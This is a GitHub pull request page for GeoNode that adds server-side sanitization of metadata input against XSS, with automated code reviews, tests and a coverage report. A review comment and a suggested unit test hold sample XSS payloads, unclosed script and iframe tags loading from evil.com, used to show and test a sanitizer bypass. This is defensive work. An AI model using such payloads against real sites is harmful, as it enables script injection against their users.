[Backport 5.0.x] Sanitize metadata input by etj · Pull Request #14343 · GeoNode/geonode

etj · 2026-06-16T14:12:08Z

Sanitize metadata input

Checklist

Reviewing is a process done by project maintainers, mostly on a volunteer basis. We try to keep the overhead as small as possible and appreciate it if you help us do so by completing the following items. Feel free to ask in a comment if you have trouble with any of them.

For all pull requests:

Confirm you have read the contribution guidelines
You have sent a Contribution Licence Agreement (CLA) as necessary (not required for small changes, e.g., fixing typos in the documentation)
Make sure the first PR targets the master branch; any backports will be managed later. This can be ignored if the PR fixes an issue that only occurs in a specific branch and not in newer ones.

The following are required only for core and extension modules (they are welcomed, but not required, for contrib modules):

There is a ticket in https://github.com/GeoNode/geonode/issues describing the issue/improvement/feature (a notable exception is changes not visible to end users)
The issue connected to the PR must have Labels and Milestone assigned
PR for bug fixes and small new features are presented as a single commit
PR title must be in the form "[Fixes #<issue_number>] Title of the PR"
New unit tests have been added covering the changes, unless there is an explanation on why the tests are not necessary/implemented

Submitting the PR does not require you to check all items, but by the time it gets merged, they should be either satisfied or inapplicable.

gemini-code-assist

Code Review

This pull request introduces a new CleanupHandler to sanitize metadata fields from potentially unsafe HTML tags (XSS protection) during deserialization, along with corresponding unit tests and localization updates. The review feedback highlights a critical security vulnerability where unclosed HTML tags can bypass the sanitization regex, suggesting a simplified pattern to catch them. Additionally, the feedback recommends removing redundant list conversions during dictionary and list iterations to improve performance, and adding a unit test to verify the sanitization of unclosed tags.

Important

The consumer version of Gemini Code Assist on GitHub is being sunset. Starting June 18, 2026, new organization installations will be blocked, and all code review activity will officially cease on July 17, 2026.
For more details on the timeline and next steps, please review the Help Documentation.

gemini-code-assist · 2026-06-16T14:14:31Z

+
+
+class CleanupHandler(MetadataHandler):
+    _HTML_LIKE_PATTERN = re.compile(r"<\s*/?\s*[a-zA-Z][^>]*>")


The regular expression _HTML_LIKE_PATTERN requires a closing > to match ([^>]*>). This creates a critical security vulnerability (XSS bypass). An attacker can submit an unclosed dangerous tag, such as <script src="http://evil.com/xss.js", which will not be matched by the pattern and thus will bypass sanitization completely. When rendered in the browser, the browser's lenient HTML parser will use subsequent tags in the page to close the unclosed tag and execute the malicious script.

To fix this, simplify the pattern to detect any potential tag start (closed or unclosed), allowing BeautifulSoup to safely parse and decompose it.

Suggested change

-    _HTML_LIKE_PATTERN = re.compile(r"<\s*/?\s*[a-zA-Z][^>]*>")
+    _HTML_LIKE_PATTERN = re.compile(r"<\s*/?\s*[a-zA-Z]")
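
The difference between the two patterns can be checked directly with the standard `re` module. The sketch below is only an illustration: the pattern strings are copied from this review comment, while the names `CLOSED_TAG_PATTERN` and `TAG_START_PATTERN` and the sample payloads are made up for the demonstration.

```python
import re

# Pattern from the diff under review: it needs a closing ">" to match.
CLOSED_TAG_PATTERN = re.compile(r"<\s*/?\s*[a-zA-Z][^>]*>")
# Pattern from the suggested change: it matches any tag start.
TAG_START_PATTERN = re.compile(r"<\s*/?\s*[a-zA-Z]")

# Hypothetical inputs chosen to exercise both patterns.
samples = {
    "closed": "<script>alert(1)</script>",
    "unclosed": '<script src="http://evil.com/xss.js"',
    "comparison": "a < b",
    "plain": "area < 10 km2",
}

results = {}
for name, text in samples.items():
    results[name] = (
        bool(CLOSED_TAG_PATTERN.search(text)),
        bool(TAG_START_PATTERN.search(text)),
    )
    print(f"{name}: closed-tag pattern={results[name][0]}, tag-start pattern={results[name][1]}")
```

Note that the looser pattern also flags harmless text such as `a < b`. That seems acceptable only if the pattern is used as a cheap pre-filter and the actual cleanup is left to the HTML parser, as the comment proposes.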

gemini-code-assist · 2026-06-16T14:14:32Z

+            for key, nested_value in list(value.items()):
+                nested_path = path + [str(key)]
+                value[key] = self._sanitize_instance(nested_value, context, errors, nested_path)
+            return value
+
+        if isinstance(value, list):
+            for idx, nested_value in enumerate(list(value)):


Creating list copies of dictionary items (list(value.items())) and list elements (list(value)) is redundant and inefficient.

Since we are only modifying the values of existing keys in the dictionary and elements in the list without changing their sizes/lengths, we can safely iterate over value.items() and value directly. This avoids unnecessary memory allocation and improves performance.

Suggested change

-            for key, nested_value in list(value.items()):
-                nested_path = path + [str(key)]
-                value[key] = self._sanitize_instance(nested_value, context, errors, nested_path)
-            return value
-
-        if isinstance(value, list):
-            for idx, nested_value in enumerate(list(value)):
+            for key, nested_value in value.items():
+                nested_path = path + [str(key)]
+                value[key] = self._sanitize_instance(nested_value, context, errors, nested_path)
+            return value
+
+        if isinstance(value, list):
+            for idx, nested_value in enumerate(value):
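
The suggestion relies on a property of Python containers: reassigning the value of an existing key or index during iteration is allowed, whereas adding or removing dictionary keys is not. A minimal sketch with made-up data, where `upper()` merely stands in for `_sanitize_instance`:

```python
# Reassigning values of existing keys while iterating over items() is fine.
data = {"title": "a", "abstract": "b"}
for key, nested_value in data.items():
    data[key] = nested_value.upper()

# The same holds for replacing list elements by index.
items = ["x", "y"]
for idx, nested_value in enumerate(items):
    items[idx] = nested_value.upper()

# Changing the dictionary's size during iteration is what raises an error.
size_change_error = None
try:
    for key in data:
        data[key + "_copy"] = data[key]
except RuntimeError as exc:
    size_change_error = str(exc)

print(data["title"], items, size_change_error)
```

The defensive copies would only matter if the nested call could add or remove entries in the container being iterated, which the quoted snippet does not appear to do.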

gemini-code-assist · 2026-06-16T14:14:32Z

+        self.assertIn("title", context["errors"])
+        self.assertIn("__errors", context["errors"]["title"])
+        self.assertIn("metadata_error_sanitized", context["errors"]["title"]["__errors"])


Add a unit test to verify that unclosed dangerous HTML tags (e.g., <script or <iframe without a closing >) are successfully detected and sanitized, preventing future regressions of the XSS bypass vulnerability.

Suggested change

-        self.assertIn("title", context["errors"])
-        self.assertIn("__errors", context["errors"]["title"])
-        self.assertIn("metadata_error_sanitized", context["errors"]["title"]["__errors"])
+        self.assertIn("title", context["errors"])
+        self.assertIn("__errors", context["errors"]["title"])
+        self.assertIn("metadata_error_sanitized", context["errors"]["title"]["__errors"])
+
+    @override_settings(LANGUAGE_CODE="en")
+    def test_pre_deserialization_sanitizes_unclosed_tags(self):
+        instance = {
+            "title": "<script src=http://evil.com/xss.js",
+            "body": "<iframe src=http://evil.com",
+        }
+        context = {"errors": {}}
+        self.handler.pre_deserialization(self.resource, {}, instance, partial=set(), context=context)
+        self.assertEqual(instance["title"], "")
+        self.assertEqual(instance["body"], "")

Copilot

Pull request overview

This PR introduces server-side sanitization of incoming metadata payloads to mitigate HTML/script injection, and adds an i18n thesaurus entry to surface a user-facing warning when sanitization occurs.

Changes:

Add a CleanupHandler that recursively strips HTML-like content from incoming metadata values (pre-deserialization).
Wire the sanitization step into MetadataManager.update_schema_instance() and propagate an errors dict via context.
Add i18n RDF labels for new/updated metadata error messages and add unit tests covering sanitization behavior.
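
A rough sketch of what such a recursive pre-deserialization cleanup could look like follows. It is not the code from this PR: the names `strip_tags`, `sanitize`, and `_TextExtractor`, and the choice to file errors under the top-level field name, are assumptions, and the standard-library `html.parser` stands in for BeautifulSoup so the example has no third-party dependency. The dotted path format and the `__errors` / `metadata_error_sanitized` keys follow the test assertions in this PR.

```python
import logging
import re
from html.parser import HTMLParser

logger = logging.getLogger(__name__)

# Tag-start detection, using the pattern suggested in the review.
HTML_LIKE = re.compile(r"<\s*/?\s*[a-zA-Z]")


class _TextExtractor(HTMLParser):
    """Hypothetical helper: collects text nodes and drops the tags."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def handle_data(self, data):
        self.chunks.append(data)


def strip_tags(text):
    parser = _TextExtractor()
    parser.feed(text)
    parser.close()  # flush any text still buffered by the parser
    return "".join(parser.chunks)


def sanitize(value, errors, path=()):
    """Clean HTML-like strings in place, recursing into dicts and lists."""
    if isinstance(value, dict):
        for key, nested in value.items():
            value[key] = sanitize(nested, errors, path + (str(key),))
        return value
    if isinstance(value, list):
        for idx, nested in enumerate(value):
            value[idx] = sanitize(nested, errors, path + (f"[{idx}]",))
        return value
    if isinstance(value, str) and HTML_LIKE.search(value):
        logger.warning("Sanitized potentially unsafe metadata field '%s'", ".".join(path))
        # Assumption: errors are keyed by the top-level field name.
        field_errors = errors.setdefault(path[0] if path else "", {})
        field_errors.setdefault("__errors", []).append("metadata_error_sanitized")
        return strip_tags(value)
    return value  # non-string scalars pass through untouched


# Made-up payload mirroring the shape used in the PR's tests.
instance = {
    "title": "<b>xss</b>",
    "details": {"body": "<p>safe</p>"},
    "items": ["ok", "<i>bad</i>"],
    "count": 3,
}
errors = {}
sanitize(instance, errors)
print(instance, errors)
```

Unlike a parser-based sanitizer that removes dangerous elements entirely, this stand-in keeps the text found inside elements such as `<script>`, so it should be read as an illustration of the traversal and error reporting only.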

Reviewed changes

Copilot reviewed 4 out of 4 changed files in this pull request and generated 2 comments.

| File | Description |
| --- | --- |
| geonode/metadata/thesauri/labels-i18n.metadata.rdf | Adds i18n thesaurus concepts/labels including `metadata_error_sanitized`. |
| geonode/metadata/tests/tests.py | Updates manager-context expectations and adds tests for sanitization/logging/error reporting. |
| geonode/metadata/manager.py | Injects `errors` into context and calls `CleanupHandler.pre_deserialization()` before handler updates. |
| geonode/metadata/handlers/meta.py | Implements `CleanupHandler` to sanitize nested strings and record warnings/errors. |

+        with self.assertLogs("geonode.metadata.handlers.meta", level="WARNING") as cm:
+            context = {"errors": {}}
+            self.handler.pre_deserialization(self.resource, {}, instance, partial=set(), context=context)
+
+        self.assertEqual(instance["title"], "xss")
+        self.assertEqual(instance["details"]["body"], "safe")
+        self.assertEqual(instance["items"][1], "bad")
+        self.assertEqual(instance["count"], 3)
+
+        logs = "\n".join(cm.output)
+        self.assertIn("Sanitized potentially unsafe metadata field 'title'", logs)
+        self.assertIn("Sanitized potentially unsafe metadata field 'details.body'", logs)
+        self.assertIn("Sanitized potentially unsafe metadata field 'items.[1]'", logs)
+
+        self.assertIn("title", context["errors"])
+        self.assertIn("__errors", context["errors"]["title"])
+        self.assertIn("metadata_error_sanitized", context["errors"]["title"]["__errors"])


+<?xml version='1.0' encoding='UTF-8'?>
+<rdf:RDF xmlns="http://www.w3.org/2004/02/skos/core#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/">
+  <ConceptScheme rdf:about="https://i18n.geonode.org">


codecov · 2026-06-16T14:27:24Z

Codecov Report

❌ Patch coverage is 96.47059% with 3 lines in your changes missing coverage. Please review.
⚠️ Please upload report for BASE (5.0.x@31b61a6). Learn more about missing BASE report.

Additional details and impacted files

@@           Coverage Diff            @@
##             5.0.x   #14343   +/-   ##
========================================
  Coverage         ?   74.51%           
========================================
  Files            ?      945           
  Lines            ?    56863           
  Branches         ?     7707           
========================================
  Hits             ?    42372           
  Misses           ?    12809           
  Partials         ?     1682
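
The figures in the report can be cross-checked with a little arithmetic. The sketch below assumes that the patch touched 85 coverable lines, which is inferred from the reported percentage and the 3 missing lines rather than stated in the report, and that the displayed project coverage is truncated to two decimals instead of rounded to nearest.

```python
import math

# Totals copied from the coverage table above.
hits, misses, partials, lines = 42372, 12809, 1682, 56863
totals_consistent = hits + misses + partials == lines

# Project coverage, truncated to two decimals (assumed display rule).
project_pct = hits / lines * 100
project_pct_truncated = math.floor(project_pct * 100) / 100

# Patch coverage: 85 coverable lines is an inferred value, 3 missing is reported.
patch_lines, patch_missing = 85, 3
patch_pct = (patch_lines - patch_missing) / patch_lines * 100

print(totals_consistent, project_pct_truncated, round(patch_pct, 5))
```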

etj self-assigned this Jun 16, 2026

Copilot AI review requested due to automatic review settings June 16, 2026 14:12

cla-bot Bot added the cla-signed CLA Bot: community license agreement signed label Jun 16, 2026

Copilot started reviewing on behalf of etj June 16, 2026 14:12

etj changed the title ~~Sanitize metadata input~~ [Backport 5.0.x] Sanitize metadata input Jun 16, 2026

etj requested a review from giohappy June 16, 2026 14:13

etj added this to the 5.0.3 milestone Jun 16, 2026

gemini-code-assist Bot reviewed Jun 16, 2026

Copilot AI reviewed Jun 16, 2026

etj force-pushed the p9f9-fj9v-50x branch from ad128fe to 8be7396 Compare June 16, 2026 15:48

Sanitize metadata input

bbf66cc

etj force-pushed the p9f9-fj9v-50x branch from 8be7396 to bbf66cc Compare June 16, 2026 16:26

giohappy approved these changes Jun 17, 2026

giohappy merged commit 730d8fa into 5.0.x Jun 17, 2026
13 checks passed

giohappy deleted the p9f9-fj9v-50x branch June 17, 2026 08:30
